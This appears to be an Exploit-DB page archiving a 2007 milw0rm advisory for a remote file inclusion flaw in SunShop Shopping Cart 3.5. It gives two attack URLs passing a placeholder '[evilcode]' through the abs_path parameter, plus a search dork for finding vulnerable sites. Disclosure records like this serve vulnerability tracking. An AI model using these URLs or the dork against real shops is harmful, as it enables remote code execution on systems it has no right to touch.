SunShop Shopping Cart <= 3.5 (abs_path) RFI Vulnerabilities



EDB-ID: 3748 CVE: 2007-2070OSVDB-ID: 37414
Author: irvianPublished: 2007-04-16Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
sunshop 4 (index.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# scripts       : SunShop v3.5
# Discovered By : irvian
# scripts site  : http://www.turnkeywebtools.com/sunshop/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
# dork          : "powered by sunshop"
------------------------------------------------------------------------------------------
bug found:
Exploit: www.target.com/index.php?abs_path=[evilcode]
         www.target.com/checkout.php?abs_path=[evilcode]
# milw0rm.com [2007-04-16]






Comments

No comments so far